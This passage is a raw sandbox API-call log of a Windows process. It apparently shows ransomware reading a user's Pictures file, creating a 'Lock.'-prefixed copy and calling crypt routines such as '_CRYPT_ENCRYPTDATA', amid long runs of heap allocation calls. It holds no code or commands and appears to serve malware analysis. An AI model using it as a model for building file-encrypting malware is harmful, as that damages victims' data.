lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0255.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0255.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0255.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0255.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0255.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0255.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0255.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0255.807] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/thpKc0ZlnbdGnIRJzL.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\thpkc0zlnbdgnirjzl.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0255.807] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0255.807] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0255.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0255.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0255.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0255.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0255.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0255.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0255.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0255.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0255.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0255.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0255.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0255.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0255.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0255.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0255.808] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0255.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0255.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0255.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0255.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0255.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0255.809] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.thpKc0ZlnbdGnIRJzL.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.thpkc0zlnbdgnirjzl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0255.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0255.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0255.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0255.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0255.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0255.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0255.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0255.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0255.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0255.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0255.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0255.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0255.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0255.811] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0255.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0255.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0255.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0255.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0255.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5e020 [0255.814] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0255.814] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0xc6f1, lpOverlapped=0x0) returned 1 [0255.818] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0255.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0255.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0255.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0255.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0255.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f1) returned 0x2f14010 [0255.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5e020 | out: hHeap=0x970000) returned 1 [0255.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0255.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0255.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0255.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0255.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0255.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0255.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0255.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0255.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f1) returned 0x2f20710 [0255.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0255.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0255.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0255.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0255.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0255.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0255.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f1) returned 0x2f14010 [0255.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0255.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0255.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0255.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0255.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0255.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0255.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0255.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0255.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0255.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0255.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0255.824] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0255.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0255.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f1) returned 0x2f14010 [0255.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ed8 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0255.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dd8 [0255.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0255.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54de8 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0255.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0255.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f1) returned 0x2f2ce10 [0255.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0255.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0255.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0255.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0255.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0255.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0255.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0255.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0255.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0255.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0255.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0255.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0255.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0255.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0255.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0255.896] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0255.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0255.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0255.897] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.897] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0255.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0255.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0255.897] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0255.897] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0255.897] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0255.897] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0255.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0255.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0255.897] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0255.897] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, 